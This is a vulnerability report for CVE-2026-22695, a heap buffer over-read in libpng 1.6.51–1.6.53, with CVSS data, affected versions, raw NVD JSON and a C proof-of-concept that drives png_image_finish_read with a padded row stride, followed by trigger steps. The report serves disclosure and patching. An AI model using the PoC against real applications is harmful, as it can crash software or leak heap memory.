Security Vulnerability Report
CVE-2026-22695 CVSS 6.1 MEDIUM

Published: 2026-01-12 23:15:53
Last Modified: 2026-01-21 18:58:56

Description

LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:* - VULNERABLE (from 1.6.51 up to, but excluding, 1.6.54)
libpng 1.6.51
libpng 1.6.52
libpng 1.6.53

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <png.h>

// PoC for CVE-2026-22695: Heap buffer over-read in png_image_finish_read
// This PoC demonstrates the vulnerability with a crafted interlaced 16-bit PNG
int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <interlaced-16-bit.png>\n", argv[0]);
        return 1;
    }

    png_image image;
    memset(&image, 0, sizeof(image));
    image.version = PNG_IMAGE_VERSION;

    // The simplified API fills in width, height and format from the file header
    if (!png_image_begin_read_from_file(&image, argv[1])) {
        fprintf(stderr, "Failed to open image: %s\n", image.message);
        return 1;
    }

    // Request 8-bit output for the 16-bit interlaced input
    image.format = PNG_FORMAT_RGBA;

    // Use a non-minimal row stride: each output row is padded beyond
    // PNG_IMAGE_ROW_STRIDE(image); the stride is counted in components
    png_int_32 row_stride = (png_int_32)PNG_IMAGE_ROW_STRIDE(image) + 64;
    png_bytep buffer = (png_bytep)malloc(PNG_IMAGE_BUFFER_SIZE(image, row_stride));
    if (!buffer) {
        png_image_free(&image);
        return 1;
    }

    // On libpng 1.6.51 to 1.6.53 this call can trigger the heap buffer over-read
    // when processing interlaced 16-bit PNGs with 8-bit output
    if (png_image_finish_read(&image, NULL, buffer, row_stride, NULL)) {
        printf("Image read successfully\n");
    } else {
        printf("Failed to read image: %s\n", image.message);
    }

    free(buffer);
    return 0;
}

/*
 * To trigger the vulnerability:
 * 1. Create a crafted interlaced PNG with 16-bit color depth
 * 2. Ensure the row stride is non-minimal (e.g., row bytes > width * bytes_per_pixel)
 * 3. Open the file using an application that uses libpng's simplified API
 * 4. The application will attempt to read beyond allocated buffer bounds
 */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22695", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:52.597", "lastModified": "2026-01-21T18:58:55.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54."}, {"lang": "es", "value": "LIBPNG es una biblioteca de referencia para su uso en aplicaciones que leen, crean y manipulan archivos de imagen ráster PNG (Portable Network Graphics). Desde 1.6.51 hasta 1.6.53, existe una lectura excesiva de búfer de pila en la función API simplificada de libpng png_image_finish_read al procesar PNGs entrelazados de 16 bits con formato de salida de 8 bits y un paso de fila no mínimo. Esto es una regresión introducida por la corrección para CVE-2025-65018. Esta vulnerabilidad está corregida en 1.6.54."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.51", "versionEndExcluding": "1.6.54", "matchCriteriaId": "6A911B80-087A-4AA8-8AC7-EC6B45CB616F"}]}]}], "references": [{"url": "https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/commit/e4f7ad4ea2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/issues/778", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}